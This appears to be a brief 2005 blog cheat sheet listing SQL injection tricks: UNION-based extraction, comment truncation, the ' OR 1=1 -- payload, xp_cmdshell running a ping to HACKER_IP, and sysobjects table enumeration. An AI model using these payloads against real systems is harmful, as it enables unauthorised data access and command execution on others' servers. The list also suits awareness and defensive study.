Friday, June 24, 2005

SQL Injection - Tricks

 Tricks attackers use
 UNION statements to append data ripped from other SQL
 “--”double hyphen comment indicator to block out the rest of the
intended SQL
 Try a single quote in input fields to see if the query fails (failure usually
indicates bad input validation and possible exploitation)
 Use logical expression ‘OR 1=1 -- To return multiple records
 exec master..xp_cmdshell ‘ping HACKER_IP’to
check for ‘sa’-level exploitable hosts
 select name from sysobjects where type = ‘u’
can expose tables to exploit
 Insert tablename exec sp_whatever –good way to see
output of stored procedures
 Use @@version to return SQL Server and OS versions and Service
Packs
Post a Comment